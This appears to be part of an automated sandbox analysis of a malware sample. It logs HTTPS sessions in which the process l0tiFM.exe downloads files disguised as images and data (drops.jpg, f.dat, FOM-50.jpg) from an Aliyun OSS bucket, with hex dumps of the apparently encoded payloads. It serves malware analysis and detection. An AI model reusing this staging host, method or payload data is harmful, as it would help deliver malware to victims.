                                                                                                              2025-01-11 03:42:35 UTC3552INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 90 00 90 00 00 ff e1 00 5a 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 05 03 01 00 05 00 00 00 01 00 00 00 4a 03 03 00 01 00 00 00 01 00 00 00 00 51 10 00 01 00 00 00 01 01 00 00 00 51 11 00 04 00 00 00 01 00 00 16 25 51 12 00 04 00 00 00 01 00 00 16 25 00 00 00 00 00 01 86 a0 00 00 b1 8f ff db 00 43 00 02 01 01 02 01 01 02 02 02 02 02 02 02 02 03 05 03 03 03 03 03 06 04 04 03 05 07 06 07 07 07 06 07 07 08 09 0b 09 08 08 0a 08 07 07 0a 0d 0a 0a 0b 0c 0c 0c 0c 07 09 0e 0f 0d 0c 0e 0b 0c 0c 0c ff db 00 43 01 02 02 02 03 03 03 06 03 03 06 0c 08 07 08 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08
                                                                                                              Data Ascii: JFIFZExifMM*JQQ%Q%CC
                                                                                                              2025-01-11 03:42:35 UTC4096INData Raw: 06 6a 97 a0 76 9f 8a 4c ce c2 04 d4 99 b6 a3 2e 14 ad df 13 51 65 93 89 43 91 9f a1 22 66 8b 67 93 6a a2 a8 41 af 7a 2c ae 4c aa 83 63 3f 31 b1 0c 38 b2 5a bc ee 9f ac 38 b8 3b d8 89 02 c6 e4 8d 4f 83 68 c8 cb e9 cd 46 82 eb f8 de 65 da d0 b3 5f 34 d9 d6 6d db 55 d9 bc fb a3 e2 61 23 e6 e4 e3 87 ec ad ee cf c4 48 ef c7 73 cd d6 f3 c4 81 f4 1c 39 58 f8 db f6 39 e6 54 8a 0c ef 0e 3c c4 02 47 ce 01 4a eb 07 3d 8b cf 64 01 b1 11 50 1f 56 fc 58 fd 52 90 48 39 56 7e 31 61 02 cb 69 da d9 d8 cc 26 ee 13 ab 4c 25 c9 2d d0 31 03 dc f8 c8 d7 3b 32 53 27 d0 3e e3 d2 43 01 15 0b c5 c7 aa 26 cf 01 8d 0f 68 05 6c 61 40 dc 57 84 5a 54 79 13 7c 39 5f 3b 5d be 3a 5e 38 29 ef 27 40 e5 0e 2f e3 91 59 ab d5 8c 1a 9b 83 db 73 71 24 d7 68 16 7f 18 08 bb 51 3d 32 5b d8 c4 b1 43
                                                                                                              Data Ascii: jvL.QeC"fgjAz,Lc?18Z8;OhFe_4mUa#Hs9X9T<GJ=dPVXRH9V~1ai&L%-1;2S'>C&hla@WZTy|9_;]:^8)'@/Ysq$hQ=2[C
                                                                                                              2025-01-11 03:42:35 UTC651INData Raw: d6 f2 f5 18 89 8e 8a db 3d b5 89 92 61 93 d9 95 d6 f9 fa e8 f6 8e e8 f9 2d 9f 8a 17 a0 e4 d1 c1 a0 b7 a6 2d 71 ae f8 c9 d9 ef da b0 c5 da fa da d3 d9 f2 c0 b8 ea 98 18 bd f0 db b2 82 ae c3 ad a0 a8 b3 8b a8 a6 a7 8d 1d d0 9d 80 92 80 87 97 c7 d6 97 a8 da 92 be bd ad bf db e0 e5 e2 8f 56 e5 a7 8b 84 86 89 eb ec 39 ec a8 95 85 a2 81 d4 9a 95 92 8b 8a ab fa fc fd fe b4 45 53 4c 46 48 36 34 f8 7b 0a 05 0b 03 0d 01 0f 1f 11 1d 13 1b 15 19 17 e7 16 1a 14 1c 12 1e 10 20 2e 22 2c 24 2a 26 28 28 d6 25 2b 23 2d 21 2f 3f 31 3d 33 3b 35 39 37 37 39 3a 3b 3c f6 8f 1f 40 51 42 43 63 45 76 3f 0a e1 4a 4b 7c 4d 3e 1b 54 09 32 53 6c 7f 97 57 40 d9 5a 77 8c 5d 42 42 71 c9 62 63 ec 65 4a 47 68 75 52 6b 60 38 6f e3 30 71 6e 2b 70 63 16 77 76 2e 4a 69 7c 7d ee 7e 96 81 8c 84
                                                                                                              Data Ascii: =a--qV9ESLFH64{ .",$*&((%+#-!/?1=3;59779:;<@QBCcEv?JK|M>T2SlW@Zw]BBqbceJGhuRk`8o0qn+pcwv.Ji|}~


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              7192.168.2.849737118.178.60.94434064C:\Users\user\Documents\l0tiFM.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-11 03:42:51 UTC114OUTGET /drops.jpg HTTP/1.1
                                                                                                              User-Agent: GetData
                                                                                                              Host: 22mm.oss-cn-hangzhou.aliyuncs.com
                                                                                                              Cache-Control: no-cache
                                                                                                              2025-01-11 03:42:51 UTC546INHTTP/1.1 200 OK
                                                                                                              Server: AliyunOSS
                                                                                                              Date: Sat, 11 Jan 2025 03:42:51 GMT
                                                                                                              Content-Type: image/jpeg
                                                                                                              Content-Length: 37274
                                                                                                              Connection: close
                                                                                                              x-oss-request-id: 6781E8BB53BCC6323541FF9C
                                                                                                              Accept-Ranges: bytes
                                                                                                              ETag: "6D4DEB9526F3973DE0F9DCE9392F8EA7"
                                                                                                              Last-Modified: Wed, 23 Oct 2024 04:47:27 GMT
                                                                                                              x-oss-object-type: Normal
                                                                                                              x-oss-hash-crc64ecma: 9193697774326766004
                                                                                                              x-oss-storage-class: Standard
                                                                                                              x-oss-ec: 0048-00000105
                                                                                                              Content-Disposition: attachment
                                                                                                              x-oss-force-download: true
                                                                                                              Content-MD5: bU3rlSbzlz3g+dzpOS+Opw==
                                                                                                              x-oss-server-time: 12
                                                                                                              2025-01-11 03:42:51 UTC3550INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 00 00 00 01 00 08 06 00 00 00 5c 72 a8 66 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 20 00 49 44 41 54 78 9c ed 9d 0b f8 6e e5 94 c0 97 91 14 26 45 21 4a 7f 25 4d 17 94 22 b9 cc 39 85 12 8d 90 2e 22 a7 9b 88 48 11 a9 4c 87 92 90 a4 d1 4c 49 3a 88 29 a1 90 4b 37 c2 14 21 83 34 51 f8 1f f7 7b ee cc 64 cc cc fe b5 ff 5b df f9 e6 fb fe df 5a 7b bf b7 ef db eb f7 3c eb 79 3c 39 ff 6f af fd ee 77 af fd be eb 5d 17 11 c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 cc 1a 95 ac 33 25 b2 46 a4 31 70 9c de 72 44 25 ff 3b 25 72 44 a4 31 70 9c de e2 06 c0 71 7a 8c 1b 00 c7 e9 31
                                                                                                              Data Ascii: PNGIHDR\rfpHYs IDATxn&E!J%M"9."HLLI:)K7!4Q{d[Z{<y<9ow]qqqqqqqqqqqqqqqqq3%F1prD%;%rD1pqz1
                                                                                                              2025-01-11 03:42:51 UTC4096INData Raw: 83 b8 15 4d f0 da 0b 73 29 d8 06 f6 9f 9a 49 70 40 2e 05 0b 01 87 5f 9b 3d 3f fb 46 f6 f7 6d f6 f6 a1 c1 89 8a 9f a0 4d d0 15 3e 81 52 1c 83 39 a1 dc d8 a4 b1 fa 64 36 ed 8c e0 b1 d4 38 8c b0 7a eb 66 d2 b1 04 38 ea 6b e3 ed c7 43 bf 5d 06 7d 27 41 5d 01 4b 93 95 46 38 1d 28 e9 88 30 07 7c dd 35 db 80 d2 93 d3 6e 43 db 93 ed f2 5c 0a 16 82 a5 2d 59 23 ef 97 b2 7d 26 78 b5 3f 28 f6 fb 7a 57 0e 65 0b 82 17 5b 53 7b f0 79 b9 14 b4 a0 ad c2 72 68 2e 05 0b e0 b9 62 7f 49 e8 29 37 0d b5 09 f0 0d d0 e7 ce 7a 7f 7d df 0e 5e 2d 93 c7 e8 b2 6c da 29 21 c0 42 13 40 32 75 5e cd 80 10 db 6f e9 43 c0 76 ea a8 2c 9a 76 83 c0 2a 4b ec 00 01 61 a5 e5 0e a4 84 90 df 49 63 c4 b6 79 52 ad 81 ac 68 3b ec 7c 36 97 82 05 40 a5 18 cb 97 71 1a 5f fe 06 8c 80 e5 5e 2f cd a3 66 11
                                                                                                              Data Ascii: Ms)Ip@._=?FmM>R9d68zf8kC]}'A]KF8(0|5nC\-Y#}&x?(zWe[S{yrh.bI)7z}^-l)!B@2u^oCv,v*KaIcyRh;|6@q_^/f
                                                                                                              2025-01-11 03:42:51 UTC4096INData Raw: eb d0 62 92 23 02 8f d8 7f 4b bb b9 f3 33 e8 e8 18 58 21 b6 49 77 40 06 1d 49 05 fd 8a 51 4f 8d b0 a7 bd 48 ea b2 d6 31 a1 a4 5b a8 ba 8e 83 f2 1b b1 75 d9 0d 05 45 38 2d 4d 44 3c 3c bc 50 38 4a b3 4c b8 f7 e5 51 53 4e 37 e8 d8 46 62 27 2f 59 92 6b ac 92 2b 02 ef 30 83 8e 18 8b 99 af dc 3b 6d 6c 22 f5 17 44 fb 10 73 ed e7 ac f9 08 7d 33 00 48 ae 08 bc 8b 0c 3a d2 fd b7 34 1f 4c 6f a1 21 c4 e7 45 ff f0 08 f5 dd 21 83 9e d6 7c 84 be 1a 80 5c 11 78 d6 50 e1 7f ce a0 a3 33 82 53 c5 36 c1 5e 9e 41 47 1c 74 57 18 f5 ec ab 01 40 7e 5a c9 7d 22 df c7 28 1e 2b b6 c8 d1 7d 32 e8 e8 0c f0 64 b1 2d a9 2f 93 3c 51 5d c7 19 74 ec da 9c 72 16 0c 00 42 6f be 1c 11 91 96 f6 75 d4 1d dc 28 83 8e 8e d4 c7 50 3f 13 db a4 3a 53 d2 3b 99 c8 2c fc b3 41 c7 fd a5 3e 9a c4 68 7c
                                                                                                              Data Ascii: b#K3X!Iw@IQOH1[uE8-MD<<P8JLQSN7Fb'/Yk+0;ml"Ds}3H:4Lo!E!|\xP3S6^AGtW@~Z}"(+}2d-/<Q]trBou(P?:S;,A>h|
                                                                                                              2025-01-11 03:42:51 UTC4096INData Raw: f9 72 b8 f8 65 fd f3 08 c8 16 67 54 0d cf 0b 6c 41 02 c8 a0 55 06 c4 14 75 72 5c ea 55 d3 97 57 dd f2 5b 5c 5d 16 d4 24 45 4a 6c da 65 e3 a7 67 ed f2 6b 6c 6d 26 e4 34 55 52 7c ca 75 f5 8f 39 05 67 33 f7 39 5a 5f 8f 3f 82 00 7c df f9 97 c0 02 ce af ac 82 30 8f 13 59 b2 1a 90 b1 7d 9c d0 12 de bf bc 92 20 9f 29 a5 86 eb 2f e1 82 8f a7 17 aa 28 54 ec d2 b1 f8 3a f6 97 9c ba 08 b7 3b 41 e0 c4 ad f5 35 fb e4 e9 cd 7d c4 46 0e e7 41 8d ee cf 27 c1 86 44 94 f5 fa dc 6a d5 5f 93 fc dd d5 6d d8 f9 d1 69 ac c5 e6 d8 25 90 f9 af 63 ad ce cb a4 12 2e a7 79 b5 d6 d3 bc 7e b2 d3 d0 b1 05 3b b4 74 ba db 28 e8 4a fc fb fa 4e 8c 4c 2d 2a 04 b2 0d 8d f7 51 6d 0c 5b 9f 51 32 37 17 a7 1a 98 e4 47 61 0e 68 aa 66 07 04 2a 98 27 ab e1 0a a2 68 09 26 c4 3c 79 b9 77 10 15 39 89
                                                                                                              Data Ascii: regTlAUur\UW[\]$EJlegklm&4UR|u9g39Z_?|0Y} )/(T:;A5}FA'Dj_mi%c.y~;t(JNL-*Qm[Q27Gahf*'h&<yw9
                                                                                                              2025-01-11 03:42:51 UTC4096INData Raw: 1d 8a 3b 3c 3d ae 77 c1 85 4a 42 44 45 85 8b 84 85 86 87 80 81 82 83 18 d0 be db 56 55 56 91 1c 7d 2a 68 9a 19 7a 2e 56 a7 26 47 16 55 a0 23 4c 1a 1e ad 28 49 1a 1d b6 35 56 06 15 b3 32 53 0e 00 bc 3f 58 0a 50 b9 c4 a5 fa e6 42 c1 a2 fe f0 4f ce af f6 e8 48 cb b4 ea 92 55 d0 b1 d6 a4 5e dd be da aa 5b da bb e2 91 64 e7 80 e6 d5 61 ec 8d ee cf 6a e9 8a ea 9e 77 f6 97 f2 d0 70 f3 9c fe c2 7d f8 99 f6 da 06 85 e6 8a c4 03 42 e3 48 c9 ca cb ff 0b 4a eb 51 d1 d2 d3 e2 13 52 f3 5a d9 da db ec 1b 5a fb 63 e1 e2 e3 97 23 62 c3 6c e9 ea eb 8d 2b 6a cb 75 f1 f2 f3 92 33 72 d3 7e f9 fa fb 99 3b 7a db 87 01 02 03 2a c3 82 23 80 09 0a 0b 69 cb 8a 2b 99 11 12 13 6c d3 92 33 92 19 1a 1b 79 db 9a 3b ab 21 22 23 24 e3 62 03 08 42 ec 6f 08 0c 4b e9 74 15 10 41 f2 71 12 14
                                                                                                              Data Ascii: ;<=wJBDEVUV}*hz.V&GU#L(I5V2S?XPBOHU^[dajwp}BHJQRZZc#bl+ju3r~;z*#i+l3y;!"#$bBoKtAq
                                                                                                              2025-01-11 03:42:51 UTC4096INData Raw: b2 3e 1f 74 b6 72 1b 60 09 41 8b 0c ce 87 0f c3 45 6e 03 c7 19 6a 67 18 52 83 1b df 9f 59 e1 51 d1 52 b0 f0 15 d5 5b 44 29 e9 2f 40 45 2e 64 a0 21 e1 aa aa 6d 6e 27 fb 35 56 53 3c f6 b2 6f bb b5 b6 b7 b0 b1 b2 b3 c8 08 d6 a7 94 cd 0f cb ac 81 c2 08 60 95 c6 04 d4 b5 b2 db 1d 91 b2 df 13 dd be b3 d4 14 da bb a8 e9 29 a7 80 aa 18 a7 2d 69 de a6 e4 26 aa 8b f8 4e 72 fb 3d b1 92 5c 50 f1 31 bf 98 f5 35 f3 e4 c9 cd 75 cd 4d ce 8f 43 cd ee 83 33 0d 86 46 d4 f5 9a 58 90 f1 de 9f 27 19 92 52 98 f9 d6 97 6b a5 c6 eb eb 5b e6 62 28 9c 24 a3 67 e9 ca 29 f0 f1 ba 78 b0 d1 d6 bf 7b 3d e2 38 30 31 32 33 44 88 46 27 1c 4d 8f 53 2c 19 42 82 40 29 06 47 93 fd 3a 5b 9f 51 32 2f 50 90 5e 3f 0c 55 95 5b 04 11 6a aa 60 01 2e ac 6c 0d 6a a2 28 09 a5 6b 14 71 cd fb bd 71 12 77
                                                                                                              Data Ascii: >tr`AEnjgRYQR[D)/@E.d!mn'5VS<o`)-i&Nr=\P15uMC3FX'Rk[b($g)x{=80123DF'MS,B@)G:[Q2/P^?U[j`.lj(kqqw
                                                                                                              2025-01-11 03:42:51 UTC4096INData Raw: 7d 1e 63 74 b0 aa 1b c8 41 42 43 0c c8 4b e2 8d b6 b5 a3 1c 82 b1 b0 18 d8 16 77 34 1d 91 13 7c 69 5a 5b 5c 5d 99 1b 44 49 e2 63 64 65 a1 23 4c 49 68 6b 6c 6d 2b 5c b9 34 41 b3 ce 75 76 77 38 31 f1 f7 58 cd 7e 7f 80 7e d6 a7 d4 cd 0f c3 ac c1 c2 08 f0 a9 c6 70 e4 a0 da 54 d0 b1 b6 97 98 99 9a d7 11 d1 ba df e4 2a 26 87 64 a5 a6 a7 e0 22 3e 8f 14 ad ae af f8 3a fe 97 fc 4a e2 93 e0 f1 31 f7 98 f5 41 eb e4 a1 52 8b 45 01 6e c7 c8 c9 09 07 00 01 02 03 98 58 9e f7 dc 9d 55 3b f0 91 51 9f f8 ed 96 56 a4 c5 f2 ab 23 e1 c2 18 17 16 15 a3 13 e9 ca a7 7b b5 d6 e3 bc 7e fa d3 78 c5 f2 fb 89 10 b6 74 04 25 4a 8a 40 21 0e 4f 8b 75 2e 03 0c 78 0c e4 3d 59 99 57 30 1d 5e 9c 54 3d 2a 53 1f d5 56 94 e1 2e 9c 63 db a6 de 7b 5d 3d 62 a0 68 09 26 67 bb 7d 16 03 7c 36 fe 7f
                                                                                                              Data Ascii: }ctABCKw4|iZ[\]DIcde#LIhklm+\4Auvw81X~~pT*&d">:J1AREnXU;QV#{~xt%J@!Ou.x=YW0^T=*SV.c{]=bh&g}|6
                                                                                                              2025-01-11 03:42:51 UTC4096INData Raw: 7d 1e 03 74 be fe 27 01 f9 46 43 44 45 0e cc 98 01 c7 c7 68 a5 4e 4f 50 b9 f8 b3 ab aa 1e dc 1c 7d 62 13 df 9d 42 1e d8 69 62 63 64 2d ed b7 20 e2 e6 4f 7c 6c 6e 6f 98 fa 92 8c 8b 3d fd f3 5c 19 7b 7b 7c 35 f5 f3 a4 c9 83 83 84 cd 0f 8f c0 02 0e af ec 8c 8e 8f 1b 1d b6 77 94 95 96 1e d0 91 d2 10 18 b9 fe 9e a0 a1 ea 28 28 81 a6 a6 a8 a9 e2 22 e4 bd e6 24 34 95 d2 b2 b4 b5 3d 3b 9c 51 ba bb bc 34 f6 a7 88 4a 46 e7 a4 c4 c6 c7 80 42 46 ef dc cc ce cf 98 58 9a f3 9c 5e 52 f3 b8 d8 da db 94 5c 1a 87 e1 e1 e2 20 28 29 2a 2b 24 25 26 27 20 21 22 23 b8 78 be d7 fc bd 7d b3 dc f1 b2 70 fc b5 3f 1f 15 49 89 4f 20 0d 4e 8c 01 41 39 c3 44 86 cf 47 9b 5d 36 1b 5c 9c 17 5f 93 5d 3e 13 54 96 1e 57 e1 c9 01 6b af 69 02 2f 60 a2 23 63 1f e5 66 a4 f1 79 b9 7f 10 3d 7e be
                                                                                                              Data Ascii: }t'FCDEhNOP}bBibcd- O|lno=\{{|5w(("$4=;Q4JFBFX^R\ ()*+$%&' !"#x}p?IO NA9DG]6\_]>TWki/`#cfy=~
                                                                                                              2025-01-11 03:42:51 UTC4096INData Raw: 39 3a 5e fa b9 1a 89 40 41 42 20 82 c1 62 f0 48 49 4a 3f 8a c9 6a f7 50 51 52 3c 92 d1 72 ee 58 59 5a 29 9a d9 7a e5 60 61 62 1a a2 e1 42 dc 68 69 6a 2a aa e9 4a d3 70 71 72 73 3c f8 e2 53 d0 79 7a 7b 34 f0 73 12 25 7e 7d 6b 9c 2a 79 78 c0 00 0e af a4 8f 8e 8f d8 1c 1e b7 c4 a7 96 97 67 0d be b3 9e 9d 9e d7 2d 2d 86 ff 91 a5 a6 4f 1c a4 aa ab e4 20 22 8b d0 87 b2 b3 5c 12 bb b7 b8 f1 37 37 98 d9 89 bf c0 29 58 ce c4 c5 8e 4a 44 ed a2 f3 cc cd 26 42 dd d1 d2 9b 59 59 f2 8b ed d9 da 33 2c d4 de df 26 65 c6 63 e4 e5 e6 a0 2e 6d ce 6a ec ed ee 8a 36 75 d6 71 f4 f5 f6 83 3e 7d de 78 fc fd fe af c6 85 26 87 04 05 06 75 ce 8d 2e 8e 0c 0d 0e 60 d6 95 36 95 14 15 16 74 de 9d 3e 9c 1c 1d 1e 7a e6 a5 06 ab 24 25 26 54 ee ad 0e a2 2c 2d 2e 5c f6 b5 16 b9 34 35 36 7f
                                                                                                              Data Ascii: 9:^@AB bHIJ?jPQR<rXYZ)z`abBhij*Jpqrs<Syz{4s%~}k*yxg--O "\77)XJD&BYY3,&ec.mj6uq>}x&u.`6t>z$%&T,-.\456
                                                                                                              2025-01-11 03:42:51 UTC956INData Raw: b0 66 1f 34 70 0d e4 0c cc 16 67 5c 09 6d 97 05 46 08 98 29 01 c5 53 75 41 52 53 54 18 6d 84 2b 4f 3c 1a dd bf 5e af 2d ec f9 63 94 9a 99 26 ae 6a 6a 26 57 be 1b 9f 3c fa 66 57 38 fe 2a 53 70 31 f9 bf 6c be b2 b3 81 86 80 83 83 84 af 87 89 80 8b 8b 85 af 8e 8f 91 9c 93 93 99 d7 96 97 99 94 9b 9b 91 5f 9e 9f a1 ab a1 a3 ae 67 a0 d7 ad c9 aa ab ad a3 af af be 13 b2 b3 b5 bb b7 b7 b6 9b ba bb bd b1 bc bf cc c0 ff c3 c5 c2 c4 c7 cf c8 dd cb cd c4 cf cf d9 13 d2 d3 d5 d1 d7 d7 dc 3b da db dd d9 df df e4 23 e2 e3 e5 ee e4 e7 e3 e8 cb eb ed ea ec ef f7 f0 a3 f3 f5 e4 f4 f7 e9 f8 df fb fd f0 ff ff 0d 63 02 03 05 02 04 07 0f 08 21 0b 0d 09 0f 0f 14 b3 12 13 15 06 17 17 0b 3b 1a 1b 1d 0e 1f 1f 33 63 22 23 25 2b 27 27 26 6b 2a 2b 2d 23 2f 2f 3e 53 32 33 35 2d 37 37
                                                                                                              Data Ascii: f4pg\mF)SuARSTm+O<^-c&jj&W<fW8*Sp1l_g;#c!;3c"#%+''&k*+-#//>S235-77


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              8192.168.2.849764118.178.60.94434064C:\Users\user\Documents\l0tiFM.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-11 03:42:54 UTC110OUTGET /f.dat HTTP/1.1
                                                                                                              User-Agent: GetData
                                                                                                              Host: 22mm.oss-cn-hangzhou.aliyuncs.com
                                                                                                              Cache-Control: no-cache
                                                                                                              2025-01-11 03:42:55 UTC558INHTTP/1.1 200 OK
                                                                                                              Server: AliyunOSS
                                                                                                              Date: Sat, 11 Jan 2025 03:42:54 GMT
                                                                                                              Content-Type: application/octet-stream
                                                                                                              Content-Length: 879
                                                                                                              Connection: close
                                                                                                              x-oss-request-id: 6781E8BEA7BABC37310D58F9
                                                                                                              Accept-Ranges: bytes
                                                                                                              ETag: "E54C4296F011EC91D935AA353C936E34"
                                                                                                              Last-Modified: Tue, 22 Oct 2024 18:02:54 GMT
                                                                                                              x-oss-object-type: Normal
                                                                                                              x-oss-hash-crc64ecma: 11142793972884948456
                                                                                                              x-oss-storage-class: Standard
                                                                                                              x-oss-ec: 0048-00000113
                                                                                                              Content-Disposition: attachment
                                                                                                              x-oss-force-download: true
                                                                                                              Content-MD5: 5UxClvAR7JHZNao1PJNuNA==
                                                                                                              x-oss-server-time: 4
                                                                                                              2025-01-11 03:42:55 UTC879INData Raw: 0f 56 0e 57 66 34 65 31 31 31 31 31 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31
                                                                                                              Data Ascii: VWf4e111111111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW111


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              9192.168.2.849775118.178.60.94434064C:\Users\user\Documents\l0tiFM.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-11 03:42:56 UTC115OUTGET /FOM-50.jpg HTTP/1.1
                                                                                                              User-Agent: GetData
                                                                                                              Host: 22mm.oss-cn-hangzhou.aliyuncs.com
                                                                                                              Cache-Control: no-cache
                                                                                                              2025-01-11 03:42:56 UTC546INHTTP/1.1 200 OK
                                                                                                              Server: AliyunOSS
                                                                                                              Date: Sat, 11 Jan 2025 03:42:56 GMT
                                                                                                              Content-Type: image/jpeg
                                                                                                              Content-Length: 55085
                                                                                                              Connection: close
                                                                                                              x-oss-request-id: 6781E8C02E5F22343495DD75
                                                                                                              Accept-Ranges: bytes
                                                                                                              ETag: "DC44AE348E6A74B3A74871020FDFAC74"
                                                                                                              Last-Modified: Tue, 22 Oct 2024 14:47:46 GMT
                                                                                                              x-oss-object-type: Normal
                                                                                                              x-oss-hash-crc64ecma: 12339968747348072397
                                                                                                              x-oss-storage-class: Standard
                                                                                                              x-oss-ec: 0048-00000105
                                                                                                              Content-Disposition: attachment
                                                                                                              x-oss-force-download: true
                                                                                                              Content-MD5: 3ESuNI5qdLOnSHECD9+sdA==
                                                                                                              x-oss-server-time: 8
                                                                                                              2025-01-11 03:42:56 UTC3550INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 90 00 90 00 00 ff e1 00 5a 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 05 03 01 00 05 00 00 00 01 00 00 00 4a 03 03 00 01 00 00 00 01 00 00 00 00 51 10 00 01 00 00 00 01 01 00 00 00 51 11 00 04 00 00 00 01 00 00 16 25 51 12 00 04 00 00 00 01 00 00 16 25 00 00 00 00 00 01 86 a0 00 00 b1 8f ff db 00 43 00 02 01 01 02 01 01 02 02 02 02 02 02 02 02 03 05 03 03 03 03 03 06 04 04 03 05 07 06 07 07 07 06 07 07 08 09 0b 09 08 08 0a 08 07 07 0a 0d 0a 0a 0b 0c 0c 0c 0c 07 09 0e 0f 0d 0c 0e 0b 0c 0c 0c ff db 00 43 01 02 02 02 03 03 03 06 03 03 06 0c 08 07 08 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08
                                                                                                              Data Ascii: JFIFZExifMM*JQQ%Q%CC
                                                                                                              2025-01-11 03:42:56 UTC4096INData Raw: 7c 7b dc 41 c2 74 77 75 74 73 65 91 8f 90 91 11 ee 84 95 e3 bf 11 84 3e 34 dc 9d f4 97 48 c7 b1 a3 a4 fc 59 d2 a0 41 56 56 53 52 9d 74 f3 32 cf a3 b4 c1 be dd b0 51 f7 a8 bc bd e7 7c 28 d0 d2 c3 c4 06 4d 38 9d 42 26 a1 cc a7 ce 30 a5 d9 3a 10 2a 2a 29 54 1c d5 87 18 57 22 8b 54 0c 8b e2 89 e5 1a 93 ef 00 44 14 14 13 6e 2a e3 ad 32 98 f2 9e f5 9c f7 10 64 04 04 03 7e 3a f3 c3 6b 03 69 05 6f 06 ef 86 f7 f5 f4 8f c9 02 cc 9b ee 44 fb 09 1f 16 17 93 e9 4c f3 1d 06 1e 1f 76 c9 ae 39 24 25 70 cf c4 3a 2a 2b 7a c5 5f 35 30 31 64 db 68 2f 36 37 6e d1 7e 23 3c 3d 68 d7 be 40 42 43 12 ad 48 55 48 49 22 dc 5a 0d 4e a7 3f 58 52 53 d7 91 72 f4 54 f9 1a 5b 02 9e d5 a0 35 ea 8e 32 35 36 ed 3a 60 3f 3d 58 9a 5e 91 e6 0d 8d 49 6f 89 65 d6 37 78 0d 73 3c f5 00 82 fc 7f 96
                                                                                                              Data Ascii: |{Atwutse>4HYAVVSRt2Q|(M8B&0:**)TW"TDn*2d~:kioDLv9$%p:*+z_501dh/67n~#<=h@BCHUHI"ZN?XRSrT[5256:`?=X^Ioe7xs<
                                                                                                              2025-01-11 03:42:56 UTC4096INData Raw: 81 d9 46 b5 47 c8 2a 32 3c cc 8d d3 4c 5c f9 22 b5 d4 95 f2 68 ad 99 9a 9b 9c 16 da bb b0 28 ce 87 b4 28 ca 83 b8 82 4a f8 fa fa 0f ab 10 f1 b2 82 f1 49 85 72 e8 30 df 53 43 c8 46 34 85 3d 05 86 38 3b 39 38 37 40 8f 33 41 88 3e ab 73 d1 d2 d3 d4 16 5d 9a 28 bd 53 d6 dc dd de df b9 be bd bd bf 6e 03 ba b9 2a 26 27 20 21 22 23 3c 3d 3e 3f 38 7e 09 a2 73 15 79 17 e4 ae 75 a2 0c 57 89 70 0c 36 33 03 a8 49 0a 5c 87 0b c8 4a ef 11 d5 56 e0 14 16 17 18 94 61 0b 9f e5 e0 6b 2d aa 6c 27 27 ea 15 2b 10 c1 c9 c2 d3 d2 a5 61 3c ba 74 3b 37 fa 05 3b 00 d1 e9 d2 c3 c2 b5 7a 48 b7 02 47 22 4a c3 51 49 49 4a c0 01 5d c3 1a b8 d8 01 af df 0e 5a de 1d b1 d3 16 b0 de a5 a1 14 3e ef 2a 64 e8 62 3c e3 25 ec 7f e1 29 e8 7f f9 34 82 f8 74 fc 33 8f fd b0 0e 6f f7 aa 96 23 aa 81
                                                                                                              Data Ascii: FG*2<L\"h((JIr0SCF4=8;987@3A>s](Sn*&' !"#<=>?8~syuWp63I\JVak-l''+a<t;7;zHG"JQIIJ]Z>*db<%)4t3o#
